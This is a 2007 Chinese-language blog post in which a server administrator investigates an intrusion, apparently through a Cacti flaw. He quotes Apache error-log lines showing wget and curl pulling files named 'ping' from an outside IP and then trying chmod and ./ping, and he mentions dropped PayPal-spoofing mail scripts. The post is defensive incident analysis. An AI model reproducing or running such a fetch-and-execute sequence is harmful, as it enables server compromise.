post by tommy @ 15 元月, 2007 12:48
早上特地把抓了那個檔案產生的時期的前後幾個小時的 apache log 來看, 花了一段時間, 結果, 並沒有發現有什麼可疑的地方. 看起來都只是一些正常的記錄. 只是在 error.log 中有這些記錄:
--21:49:11-- http://143.225.151.190/libsh/ping.txt
=> `ping.txt'
Connecting to 143.225.151.190:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 345 [text/plain]
ping.txt: Permission denied
Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
Can't open perl script "temp2006": No such file or directory
--21:49:12-- http://143.225.151.190/libsh/ping
=> `ping'
Connecting to 143.225.151.190:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15,808 (15K) [text/plain]
ping: Permission denied
Cannot write to `ping' (Permission denied).
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
Warning: Failed to create the file ping
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 17 15808 17 2896 0 0 261k 0 --:--:-- --:--:-- --:--:-- 261k
curl: (23) Failed writing body
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M100 345 100 345 0 0 32140 0 --:--:-- --:--:-- --:--:-- 32140^M100 345 100 345 0 0 31622 0 --:--:-- --:--:-- --:--:-- 0
其他的 access.log 中, 在該時間前後幾個小時內, 看起來都沒什麼異常. 查了一下系統中 Apache 有存取的路徑, 也沒什麼新增可疑的檔案.
目前好像什麼事也不能做... 就繼續觀察看看吧.
2007/01/16:
晚上發現檔案又出現了 (這次多了一些打算假冒 paypal 送信的程式, 不過看起來應該都沒被執行到). 這次查了一下, 發現可能是 Cacti 的問題. 目前 Debian 中使用的 0.8.6i 的修正在這兒. 如果你有使用 Cacti, 請儘快修正你的程式.
不過, 我懷疑我這兒出現的並不是同一個問題. 因為在我的 Apache 的 log 檔案中, 只有發現有一筆記錄對 cmd.php 做這個動作, 但是路徑不對, 並沒有正確的執行. 目前先修正這個問題看看, 我覺得應該還有其他的問題吧.